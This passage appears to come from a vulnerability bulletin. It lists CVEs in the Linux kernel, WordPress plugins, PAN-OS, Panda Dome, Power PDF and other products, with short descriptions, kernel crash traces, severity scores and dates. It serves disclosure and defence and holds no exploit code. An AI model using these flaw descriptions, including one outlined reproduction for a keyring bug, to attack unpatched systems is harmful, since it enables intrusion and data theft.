In the Linux kernel, the following vulnerability has been resolved: vsock/virtio: Initialization of the dangling pointer occurring in vsk->trans During loopback communication, a dangling pointer can be created in vsk->trans, potentially leading to a Use-After-Free condition. This issue is resolved by initializing vsk->trans to NULL. | 2024-11-19 | 7.8 | CVE-2024-50264 |
| linux -- linux_kernel |
In the Linux kernel, the following vulnerability has been resolved: USB: serial: io_edgeport: fix use after free in debug printk The "dev_dbg(&urb->dev->dev, ..." which happens after usb_free_urb(urb) is a use after free of the "urb" pointer. Store the "dev" pointer at the start of the function to avoid this issue. | 2024-11-19 | 7.8 | CVE-2024-50267 |
| linux -- linux_kernel |
In the Linux kernel, the following vulnerability has been resolved: net: vertexcom: mse102x: Fix possible double free of TX skb The scope of the TX skb is wider than just mse102x_tx_frame_spi(), so in case the TX skb room needs to be expanded, we should free the the temporary skb instead of the original skb. Otherwise the original TX skb pointer would be freed again in mse102x_tx_work(), which leads to crashes: Internal error: Oops: 0000000096000004 [#2] PREEMPT SMP CPU: 0 PID: 712 Comm: kworker/0:1 Tainted: G D 6.6.23 Hardware name: chargebyte Charge SOM DC-ONE (DT) Workqueue: events mse102x_tx_work [mse102x] pstate: 20400009 (nzCv daif +PAN -UAO -TCO -DIT -SSBS BTYPE=--) pc : skb_release_data+0xb8/0x1d8 lr : skb_release_data+0x1ac/0x1d8 sp : ffff8000819a3cc0 x29: ffff8000819a3cc0 x28: ffff0000046daa60 x27: ffff0000057f2dc0 x26: ffff000005386c00 x25: 0000000000000002 x24: 00000000ffffffff x23: 0000000000000000 x22: 0000000000000001 x21: ffff0000057f2e50 x20: 0000000000000006 x19: 0000000000000000 x18: ffff00003fdacfcc x17: e69ad452d0c49def x16: 84a005feff870102 x15: 0000000000000000 x14: 000000000000024a x13: 0000000000000002 x12: 0000000000000000 x11: 0000000000000400 x10: 0000000000000930 x9 : ffff00003fd913e8 x8 : fffffc00001bc008 x7 : 0000000000000000 x6 : 0000000000000008 x5 : ffff00003fd91340 x4 : 0000000000000000 x3 : 0000000000000009 x2 : 00000000fffffffe x1 : 0000000000000000 x0 : 0000000000000000 Call trace: skb_release_data+0xb8/0x1d8 kfree_skb_reason+0x48/0xb0 mse102x_tx_work+0x164/0x35c [mse102x] process_one_work+0x138/0x260 worker_thread+0x32c/0x438 kthread+0x118/0x11c ret_from_fork+0x10/0x20 Code: aa1303e0 97fffab6 72001c1f 54000141 (f9400660) | 2024-11-19 | 7.8 | CVE-2024-50276 |
| linux -- linux_kernel |
In the Linux kernel, the following vulnerability has been resolved: drm/amdgpu: add missing size check in amdgpu_debugfs_gprwave_read() Avoid a possible buffer overflow if size is larger than 4K. (cherry picked from commit f5d873f5825b40d886d03bd2aede91d4cf002434) | 2024-11-19 | 7.8 | CVE-2024-50282 |
| linux -- linux_kernel |
In the Linux kernel, the following vulnerability has been resolved: ksmbd: fix slab-use-after-free in smb3_preauth_hash_rsp ksmbd_user_session_put should be called under smb3_preauth_hash_rsp(). It will avoid freeing session before calling smb3_preauth_hash_rsp(). | 2024-11-19 | 7.8 | CVE-2024-50283 |
| linux -- linux_kernel |
In the Linux kernel, the following vulnerability has been resolved: net/sched: stop qdisc_tree_reduce_backlog on TC_H_ROOT In qdisc_tree_reduce_backlog, Qdiscs with major handle ffff: are assumed to be either root or ingress. This assumption is bogus since it's valid to create egress qdiscs with major handle ffff: Budimir Markovic found that for qdiscs like DRR that maintain an active class list, it will cause a UAF with a dangling class pointer. In 066a3b5b2346, the concern was to avoid iterating over the ingress qdisc since its parent is itself. The proper fix is to stop when parent TC_H_ROOT is reached because the only way to retrieve ingress is when a hierarchy which does not contain a ffff: major handle call into qdisc_lookup with TC_H_MAJ(TC_H_ROOT). In the scenario where major ffff: is an egress qdisc in any of the tree levels, the updates will also propagate to TC_H_ROOT, which then the iteration must stop. net/sched/sch_api.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) | 2024-11-19 | 7.8 | CVE-2024-53057 |
| linux -- linux_kernel |
In the Linux kernel, the following vulnerability has been resolved: media: s5p-jpeg: prevent buffer overflows The current logic allows word to be less than 2. If this happens, there will be buffer overflows, as reported by smatch. Add extra checks to prevent it. While here, remove an unused word = 0 assignment. | 2024-11-19 | 7.8 | CVE-2024-53061 |
| linux -- linux_kernel |
In the Linux kernel, the following vulnerability has been resolved: firmware: arm_scmi: Fix slab-use-after-free in scmi_bus_notifier() The scmi_dev->name is released prematurely in __scmi_device_destroy(), which causes slab-use-after-free when accessing scmi_dev->name in scmi_bus_notifier(). So move the release of scmi_dev->name to scmi_device_release() to avoid slab-use-after-free. | BUG: KASAN: slab-use-after-free in strncmp+0xe4/0xec | Read of size 1 at addr ffffff80a482bcc0 by task swapper/0/1 | | CPU: 1 PID: 1 Comm: swapper/0 Not tainted 6.6.38-debug #1 | Hardware name: Qualcomm Technologies, Inc. SA8775P Ride (DT) | Call trace: | dump_backtrace+0x94/0x114 | show_stack+0x18/0x24 | dump_stack_lvl+0x48/0x60 | print_report+0xf4/0x5b0 | kasan_report+0xa4/0xec | __asan_report_load1_noabort+0x20/0x2c | strncmp+0xe4/0xec | scmi_bus_notifier+0x5c/0x54c | notifier_call_chain+0xb4/0x31c | blocking_notifier_call_chain+0x68/0x9c | bus_notify+0x54/0x78 | device_del+0x1bc/0x840 | device_unregister+0x20/0xb4 | __scmi_device_destroy+0xac/0x280 | scmi_device_destroy+0x94/0xd0 | scmi_chan_setup+0x524/0x750 | scmi_probe+0x7fc/0x1508 | platform_probe+0xc4/0x19c | really_probe+0x32c/0x99c | __driver_probe_device+0x15c/0x3c4 | driver_probe_device+0x5c/0x170 | __driver_attach+0x1c8/0x440 | bus_for_each_dev+0xf4/0x178 | driver_attach+0x3c/0x58 | bus_add_driver+0x234/0x4d4 | driver_register+0xf4/0x3c0 | __platform_driver_register+0x60/0x88 | scmi_driver_init+0xb0/0x104 | do_one_initcall+0xb4/0x664 | kernel_init_freeable+0x3c8/0x894 | kernel_init+0x24/0x1e8 | ret_from_fork+0x10/0x20 | | Allocated by task 1: | kasan_save_stack+0x2c/0x54 | kasan_set_track+0x2c/0x40 | kasan_save_alloc_info+0x24/0x34 | __kasan_kmalloc+0xa0/0xb8 | __kmalloc_node_track_caller+0x6c/0x104 | kstrdup+0x48/0x84 | kstrdup_const+0x34/0x40 | __scmi_device_create.part.0+0x8c/0x408 | scmi_device_create+0x104/0x370 | scmi_chan_setup+0x2a0/0x750 | scmi_probe+0x7fc/0x1508 | platform_probe+0xc4/0x19c | really_probe+0x32c/0x99c | __driver_probe_device+0x15c/0x3c4 | driver_probe_device+0x5c/0x170 | __driver_attach+0x1c8/0x440 | bus_for_each_dev+0xf4/0x178 | driver_attach+0x3c/0x58 | bus_add_driver+0x234/0x4d4 | driver_register+0xf4/0x3c0 | __platform_driver_register+0x60/0x88 | scmi_driver_init+0xb0/0x104 | do_one_initcall+0xb4/0x664 | kernel_init_freeable+0x3c8/0x894 | kernel_init+0x24/0x1e8 | ret_from_fork+0x10/0x20 | | Freed by task 1: | kasan_save_stack+0x2c/0x54 | kasan_set_track+0x2c/0x40 | kasan_save_free_info+0x38/0x5c | __kasan_slab_free+0xe8/0x164 | __kmem_cache_free+0x11c/0x230 | kfree+0x70/0x130 | kfree_const+0x20/0x40 | __scmi_device_destroy+0x70/0x280 | scmi_device_destroy+0x94/0xd0 | scmi_chan_setup+0x524/0x750 | scmi_probe+0x7fc/0x1508 | platform_probe+0xc4/0x19c | really_probe+0x32c/0x99c | __driver_probe_device+0x15c/0x3c4 | driver_probe_device+0x5c/0x170 | __driver_attach+0x1c8/0x440 | bus_for_each_dev+0xf4/0x178 | driver_attach+0x3c/0x58 | bus_add_driver+0x234/0x4d4 | driver_register+0xf4/0x3c0 | __platform_driver_register+0x60/0x88 | scmi_driver_init+0xb0/0x104 | do_one_initcall+0xb4/0x664 | kernel_init_freeable+0x3c8/0x894 | kernel_init+0x24/0x1e8 | ret_from_fork+0x10/0x20 | 2024-11-19 | 7.8 | CVE-2024-53068 |
| linux -- linux_kernel |
In the Linux kernel, the following vulnerability has been resolved: usb: typec: fix potential out of bounds in ucsi_ccg_update_set_new_cam_cmd() The "*cmd" variable can be controlled by the user via debugfs. That means "new_cam" can be as high as 255 while the size of the uc->updated[] array is UCSI_MAX_ALTMODES (30). The call tree is: ucsi_cmd() // val comes from simple_attr_write_xsigned() -> ucsi_send_command() -> ucsi_send_command_common() -> ucsi_run_command() // calls ucsi->ops->sync_control() -> ucsi_ccg_sync_control() | 2024-11-19 | 7.1 | CVE-2024-50268 |
| linux -- linux_kernel |
In the Linux kernel, the following vulnerability has been resolved: security/keys: fix slab-out-of-bounds in key_task_permission KASAN reports an out of bounds read: BUG: KASAN: slab-out-of-bounds in __kuid_val include/linux/uidgid.h:36 BUG: KASAN: slab-out-of-bounds in uid_eq include/linux/uidgid.h:63 [inline] BUG: KASAN: slab-out-of-bounds in key_task_permission+0x394/0x410 security/keys/permission.c:54 Read of size 4 at addr ffff88813c3ab618 by task stress-ng/4362 CPU: 2 PID: 4362 Comm: stress-ng Not tainted 5.10.0-14930-gafbffd6c3ede #15 Call Trace: __dump_stack lib/dump_stack.c:82 [inline] dump_stack+0x107/0x167 lib/dump_stack.c:123 print_address_description.constprop.0+0x19/0x170 mm/kasan/report.c:400 __kasan_report.cold+0x6c/0x84 mm/kasan/report.c:560 kasan_report+0x3a/0x50 mm/kasan/report.c:585 __kuid_val include/linux/uidgid.h:36 [inline] uid_eq include/linux/uidgid.h:63 [inline] key_task_permission+0x394/0x410 security/keys/permission.c:54 search_nested_keyrings+0x90e/0xe90 security/keys/keyring.c:793 This issue was also reported by syzbot. It can be reproduced by following these steps(more details [1]): 1. Obtain more than 32 inputs that have similar hashes, which ends with the pattern '0xxxxxxxe6'. 2. Reboot and add the keys obtained in step 1. The reproducer demonstrates how this issue happened: 1. In the search_nested_keyrings function, when it iterates through the slots in a node(below tag ascend_to_node), if the slot pointer is meta and node->back_pointer != NULL(it means a root), it will proceed to descend_to_node. However, there is an exception. If node is the root, and one of the slots points to a shortcut, it will be treated as a keyring. 2. Whether the ptr is keyring decided by keyring_ptr_is_keyring function. However, KEYRING_PTR_SUBTYPE is 0x2UL, the same as ASSOC_ARRAY_PTR_SUBTYPE_MASK. 3. When 32 keys with the similar hashes are added to the tree, the ROOT has keys with hashes that are not similar (e.g. slot 0) and it splits NODE A without using a shortcut. When NODE A is filled with keys that all hashes are xxe6, the keys are similar, NODE A will split with a shortcut. Finally, it forms the tree as shown below, where slot 6 points to a shortcut. NODE A +------>+---+ ROOT | | 0 | xxe6 +---+ | +---+ xxxx | 0 | shortcut : : xxe6 +---+ | +---+ xxe6 : : | | | xxe6 +---+ | +---+ | 6 |---+ : : xxe6 +---+ +---+ xxe6 : : | f | xxe6 +---+ +---+ xxe6 | f | +---+ 4. As mentioned above, If a slot(slot 6) of the root points to a shortcut, it may be mistakenly transferred to a key*, leading to a read out-of-bounds read. To fix this issue, one should jump to descend_to_node if the ptr is a shortcut, regardless of whether the node is root or not. [1] https://lore.kernel.org/linux-kernel/1cfa878e-8c7b-4570-8606-21daf5e13ce7@huaweicloud.com/ [jarkko: tweaked the commit message a bit to have an appropriate closes tag.] | 2024-11-19 | 7.1 | CVE-2024-50301 |
| linux -- linux_kernel |
In the Linux kernel, the following vulnerability has been resolved: media: mgb4: protect driver against spectre Frequency range is set from sysfs via frequency_range_store(), being vulnerable to spectre, as reported by smatch: drivers/media/pci/mgb4/mgb4_cmt.c:231 mgb4_cmt_set_vin_freq_range() warn: potential spectre issue 'cmt_vals_in' [r] drivers/media/pci/mgb4/mgb4_cmt.c:238 mgb4_cmt_set_vin_freq_range() warn: possible spectre second half. 'reg_set' Fix it. | 2024-11-19 | 7.1 | CVE-2024-53062 |
| linux -- linux_kernel |
In the Linux kernel, the following vulnerability has been resolved: virtio_net: Add hash_key_length check Add hash_key_length check in virtnet_probe() to avoid possible out of bound errors when setting/reading the hash key. | 2024-11-19 | 7.1 | CVE-2024-53082 |
| linux -- linux_kernel |
In the Linux kernel, the following vulnerability has been resolved: ksmbd: fix slab-use-after-free in ksmbd_smb2_session_create There is a race condition between ksmbd_smb2_session_create and ksmbd_expire_session. This patch add missing sessions_table_lock while adding/deleting session from global session table. | 2024-11-19 | 7 | CVE-2024-50286 |
| lis -- video_gallery |
Deserialization of Untrusted Data vulnerability in Lis Lis Video Gallery allows Object Injection.This issue affects Lis Video Gallery: from n/a through 0.2.1. | 2024-11-18 | 9.8 | CVE-2024-52430 |
| litestar -- litestar |
Litestar is an Asynchronous Server Gateway Interface (ASGI) framework. Prior to version 2.13.0, the multipart form parser shipped with litestar expects the entire request body as a single byte string and there is no default limit for the total size of the request body. This allows an attacker to upload arbitrary large files wrapped in a `multipart/form-data` request and cause excessive memory consumption on the server. The multipart form parser in affected versions is vulnerable to this type of attack by design. The public method signature as well as its implementation both expect the entire request body to be available as a single byte string. It is not possible to accept large file uploads in a safe way using this parser. This may be a regression, as a variation of this issue was already reported in CVE-2023-25578. Limiting the part number is not sufficient to prevent out-of-memory errors on the server. A patch is available in version 2.13.0. | 2024-11-20 | 7.5 | CVE-2024-52581 |
| mindstien -- my_geo_posts_free |
Deserialization of Untrusted Data vulnerability in Mindstien Technologies My Geo Posts Free allows Object Injection.This issue affects My Geo Posts Free: from n/a through 1.2. | 2024-11-18 | 9.8 | CVE-2024-52433 |
| wordpress--wordpress |
The Social Login plugin for WordPress is vulnerable to authentication bypass in all versions up to, and including, 5.9.0. This is due to insufficient verification on the user being returned by the social login token. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the email and the user does not have an already-existing account for the service returning the token. | 2024-11-23 | 9.8 | CVE-2024-10961 |
| ibm--ibm |
IBM Engineering Systems Design Rhapsody - Model Manager 7.0.2 and 7.0.3 could allow a remote attacker to bypass security restrictions, caused by a race condition. By sending a specially crafted request, an attacker could exploit this vulnerability to remotely execute code. | 2024-11-22 | 9.8 | CVE-2024-41779 |
| wordpress--wordpress |
The LA-Studio Element Kit for Elementor plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 1.4.2 via the _load_template function. This makes it possible for authenticated attackers, with Contributor-level access and above, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other "safe" file types can be uploaded and included. | 2024-11-23 | 8.8 | CVE-2024-10873 |
| wordpress--wordpress |
The WP-Orphanage Extended plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.2. This is due to missing or incorrect nonce validation on the wporphanageex_menu_settings() function. This makes it possible for unauthenticated attackers to escalate the privileges of all orphan accounts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2024-11-23 | 8.8 | CVE-2024-11415 |
| codesys--codesys |
A low privileged remote attacker may modify the configuration of the CODESYS V3 service through a missing authentication vulnerability which could lead to full system access and/or DoS. | 2024-11-18 | 8.8 | CVE-2024-41969 |
| wordpress--wordpress |
The School Management System for Wordpress plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the mj_smgt_load_documets_new() and mj_smgt_load_documets() functions in all versions up to, and including, 91.5.0. This makes it possible for authenticated attackers, with Student-level access and above, to upload arbitrary files on the affected site's server which may make remote code execution possible. | 2024-11-23 | 8.8 | CVE-2024-9660 |
| cisco--cisco |
A vulnerability in the CLI of Cisco SD-WAN Software could allow an authenticated, local attacker to create or overwrite arbitrary files on an affected device, which could result in a denial of service (DoS) condition. The vulnerability is due to insufficient input validation for specific commands. An attacker could exploit this vulnerability by including crafted arguments to those specific commands. A successful exploit could allow the attacker to create or overwrite arbitrary files on the affected device, which could result in a DoS condition.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability. | 2024-11-18 | 8.4 | CVE-2020-26071 |
| wordpress--wordpress |
The Image Optimizer, Resizer and CDN - Sirv plugin for WordPress is vulnerable to unauthorized modification of data that can lead to a denial of service due to insufficient validation on the filename parameter of the sirv_upload_file_by_chunks() function and lack of in all versions up to, and including, 7.3.0. This makes it possible for authenticated attackers, with Contributor-level access and above, to delete arbitrary option values on the WordPress site. This can be leveraged to delete an option that would create an error on the site and deny service to legitimate users. | 2024-11-20 | 8.1 | CVE-2024-10855 |
| wordpress--wordpress |
The Sky Addons for Elementor (Free Templates Library, Live Copy, Animations, Post Grid, Post Carousel, Particles, Sliders, Chart, Blogs) plugin for WordPress is vulnerable to unauthorized modification of data that can lead to a denial of service due to a missing capability check on the save_options() function in all versions up to, and including, 2.6.2. This makes it possible for authenticated attackers, with subscriber-level access and above, to update arbitrary options on the WordPress site. Please note this is limited to option values that can be saved as arrays. | 2024-11-22 | 8.1 | CVE-2024-11104 |
| wordpress--wordpress |
The Sky Addons for Elementor (Free Templates Library, Live Copy, Animations, Post Grid, Post Carousel, Particles, Sliders, Chart, Blog, Video Gallery) plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.6.1. This is due to missing or incorrect nonce validation on the save_options() function. This makes it possible for unauthenticated attackers to update arbitrary options on the WordPress site via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. Please note this is limited to option values that can be saved as arrays. | 2024-11-22 | 8.1 | CVE-2024-11601 |
| WAGO--TP600 |
A low privileged remote attacker may modify the boot mode configuration setup of the device, leading to modification of the firmware upgrade process or a denial-of-service attack. | 2024-11-18 | 8.1 | CVE-2024-41967 |
| WAGO--TP600 |
A low privileged remote attacker can overwrite an arbitrary file on the filesystem leading to a DoS and data loss. | 2024-11-18 | 8.1 | CVE-2024-41971 |
| WAGO--WAGO |
A low privileged remote attacker can specify an arbitrary file on the filesystem which may lead to an arbitrary file writes with root privileges. | 2024-11-18 | 8.1 | CVE-2024-41973 |
| IBM--Concert Software |
IBM Concert Software 1.0.0, 1.0.1, 1.0.2, and 1.0.2.1 is vulnerable to SQL injection. A remote attacker could send specially crafted SQL statements, which could allow the attacker to view, add, modify, or delete information in the back-end database. | 2024-11-19 | 7.6 | CVE-2024-52360 |
| n/a -- n/a |
The MP3 Sticky Player plugin for WordPress is vulnerable to Directory Traversal in all versions up to, and including, 8.0 via the content/downloader.php file. This makes it possible for unauthenticated attackers to read the contents of arbitrary files on the server, which can contain sensitive information. Please note the vendor released the patched version as the same version as the affected version. | 2024-11-23 | 7.5 | CVE-2024-10803 |
| n/a -- n/a |
Vulnerability in the Oracle Agile PLM Framework product of Oracle Supply Chain (component: Software Development Kit, Process Extension). The supported version that is affected is 9.3.6. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Agile PLM Framework. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Agile PLM Framework accessible data. CVSS 3.1 Base Score 7.5 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N). | 2024-11-18 | 7.5 | CVE-2024-21287 |
| n/a -- n/a |
The The Request a Quote for WooCommerce and Elementor - Get a Quote Button - Product Enquiry Form Popup - Product Quotation plugin for WordPress is vulnerable to arbitrary shortcode execution via fire_contact_form AJAX action in all versions up to, and including, 1.4. This is due to the software allowing users to execute an action that does not properly validate a value before running do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes. | 2024-11-23 | 7.3 | CVE-2024-11034 |
| n/a -- n/a |
The Activity Log - Monitor & Record User Changes plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the event parameters in all versions up to, and including, 2.11.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever an administrative user accesses an injected page. | 2024-11-21 | 7.2 | CVE-2024-10788 |
| n/a -- n/a |
A low privileged remote attacker may modify the BACNet service properties due to incorrect permission assignment for critical resources which may lead to a DoS limited to BACNet communication. | 2024-11-18 | 7.1 | CVE-2024-41974 |
| nixsolutions -- nix_anti-spam_light |
Deserialization of Untrusted Data vulnerability in NIX Solutions Ltd NIX Anti-Spam Light allows Object Injection.This issue affects NIX Anti-Spam Light: from n/a through 0.0.4. | 2024-11-18 | 9.8 | CVE-2024-52432 |
| paloaltonetworks -- pan-os |
An authentication bypass in Palo Alto Networks PAN-OS software enables an unauthenticated attacker with network access to the management web interface to gain PAN-OS administrator privileges to perform administrative actions, tamper with the configuration, or exploit other authenticated privilege escalation vulnerabilities like CVE-2024-9474 https://security.paloaltonetworks.com/CVE-2024-9474 . The risk of this issue is greatly reduced if you secure access to the management web interface by restricting access to only trusted internal IP addresses according to our recommended best practice deployment guidelines https://live.paloaltonetworks.com/t5/community-blogs/tips-amp-tricks-how-to-secure-the-management-access-of-your-palo/ba-p/464431 . This issue is applicable only to PAN-OS 10.2, PAN-OS 11.0, PAN-OS 11.1, and PAN-OS 11.2 software. Cloud NGFW and Prisma Access are not impacted by this vulnerability. | 2024-11-18 | 9.8 | CVE-2024-0012 |
| paloaltonetworks -- pan-os |
A privilege escalation vulnerability in Palo Alto Networks PAN-OS software allows a PAN-OS administrator with access to the management web interface to perform actions on the firewall with root privileges. Cloud NGFW and Prisma Access are not impacted by this vulnerability. | 2024-11-18 | 7.2 | CVE-2024-9474 |
| pandasecurity -- panda_dome |
Panda Security Dome Link Following Local Privilege Escalation Vulnerability. This vulnerability allows local attackers to escalate privileges on affected installations of Panda Security Dome. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the PSANHost executable. By creating a junction, an attacker can abuse the service to delete arbitrary files. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of SYSTEM. Was ZDI-CAN-23402. | 2024-11-22 | 7.8 | CVE-2024-7242 |
| pandasecurity -- panda_dome |
Panda Security Dome Link Following Local Privilege Escalation Vulnerability. This vulnerability allows local attackers to escalate privileges on affected installations of Panda Security Dome. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the PSANHost executable. By creating a junction, an attacker can abuse the service to create arbitrary files. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of SYSTEM. Was ZDI-CAN-23413. | 2024-11-22 | 7 | CVE-2024-7243 |
| pandasecurity -- panda_dome |
Panda Security Dome VPN DLL Hijacking Local Privilege Escalation Vulnerability. This vulnerability allows local attackers to escalate privileges on affected installations of Panda Security Dome. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the VPN process. The process does not restrict DLL search to trusted paths, which can result in the loading of a malicious DLL. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of SYSTEM. Was ZDI-CAN-23428. | 2024-11-22 | 7 | CVE-2024-7244 |
| pandasecurity -- panda_dome |
Panda Security Dome VPN Incorrect Permission Assignment Local Privilege Escalation Vulnerability. This vulnerability allows local attackers to escalate privileges on affected installations of Panda Security Dome. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the Hydra Sdk Windows Service. The issue lies in the lack of proper permissions set on a folder created by the service. An attacker can leverage this vulnerability to escalate privileges and execute arbitrary code in the context of SYSTEM. Was ZDI-CAN-23429. | 2024-11-22 | 7 | CVE-2024-7245 |
| phpgurukul -- boat_booking_system |
File Upload vulnerability in change-image.php in Anuj Kumar's Boat Booking System version 1.0 allows local attackers to upload a malicious PHP script via the Image Upload Mechanism parameter. | 2024-11-20 | 7.2 | CVE-2024-51208 |
| pressaholic -- wordpress_video_robot |
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Pressaholic WordPress Video Robot - The Ultimate Video Importer allows SQL Injection.This issue affects WordPress Video Robot - The Ultimate Video Importer: from n/a through 1.20.0. | 2024-11-18 | 9.8 | CVE-2024-52431 |
| qualcomm -- mdm9206_firmware |
Certain unprivileged processes are able to perform IOCTL calls. | 2024-11-22 | 7.8 | CVE-2017-9711 |
| scripteo -- ads_booster_by_ads_pro |
Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Scripteo Ads Booster by Ads Pro allows PHP Local File Inclusion.This issue affects Ads Booster by Ads Pro: from n/a through 1.12. | 2024-11-18 | 9.8 | CVE-2024-52428 |
| siemens -- tecnomatix_plant_simulation |
A vulnerability has been identified in Tecnomatix Plant Simulation V2302 (All versions < V2302.0018), Tecnomatix Plant Simulation V2404 (All versions < V2404.0007). The affected applications contain a stack based overflow vulnerability while parsing specially crafted WRL files. This could allow an attacker to execute code in the context of the current process. (ZDI-CAN-24486) | 2024-11-18 | 7.8 | CVE-2024-52572 |
| supsystic -- popup |
Improper Neutralization of Special Elements Used in a Template Engine vulnerability in Supsystic Popup by Supsystic allows Command Injection.This issue affects Popup by Supsystic: from n/a through 1.10.29. | 2024-11-18 | 9.1 | CVE-2024-52434 |
| tenda -- ac6_firmware |
Tenda AC6 v2.0 v15.03.06.50 was discovered to contain a buffer overflow in the function 'fromSetSysTime. | 2024-11-19 | 9.8 | CVE-2024-52714 |
| tungstenautomation -- power_pdf |
Tungsten Automation Power PDF XPS File Parsing Use-After-Free Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Tungsten Automation Power PDF. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of XPS files. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-24385. | 2024-11-22 | 7.8 | CVE-2024-9732 |
| tungstenautomation -- power_pdf |
Tungsten Automation Power PDF PDF File Parsing Out-Of-Bounds Write Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Tungsten Automation Power PDF. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of PDF files. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated object. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-24389. | 2024-11-22 | 7.8 | CVE-2024-9733 |
| tungstenautomation -- power_pdf |
Tungsten Automation Power PDF PDF File Parsing Heap-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Tungsten Automation Power PDF. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of PDF files. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length heap-based buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-24400. | 2024-11-22 | 7.8 | CVE-2024-9734 |
| tungstenautomation -- power_pdf |
Tungsten Automation Power PDF JPF File Parsing Out-Of-Bounds Write Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Tungsten Automation Power PDF. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of JPF files. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated object. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-24451. | 2024-11-22 | 7.8 | CVE-2024-9735 |
| tungstenautomation -- power_pdf |
Tungsten Automation Power PDF PDF File Parsing Out-Of-Bounds Write Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Tungsten Automation Power PDF. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of PDF files. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-24452. | 2024-11-22 | 7.8 | CVE-2024-9736 |
| tungstenautomation -- power_pdf |
Tungsten Automation Power PDF PDF File Parsing Out-Of-Bounds Write Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Tungsten Automation Power PDF. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of PDF files. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated object. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-24453. | 2024-11-22 | 7.8 | CVE-2024-9737 |
| tungstenautomation -- power_pdf |
Tungsten Automation Power PDF PDF File Parsing Memory Corruption Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Tungsten Automation Power PDF. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of PDF files. The issue results from the lack of proper validation of user-supplied data, which can result in a memory corruption condition. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-24454. | 2024-11-22 | 7.8 | CVE-2024-9738 |
| tungstenautomation -- power_pdf |
Tungsten Automation Power PDF PDF File Parsing Memory Corruption Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Tungsten Automation Power PDF. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of PDF files. The issue results from the lack of proper validation of user-supplied data, which can result in a memory corruption condition. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-24455. | 2024-11-22 | 7.8 | CVE-2024-9739 |
| tungstenautomation -- power_pdf |
Tungsten Automation Power PDF BMP File Parsing Out-Of-Bounds Write Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Tungsten Automation Power PDF. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of BMP files. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated object. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-24456. | 2024-11-22 | 7.8 | CVE-2024-9740 |
| tungstenautomation -- power_pdf |
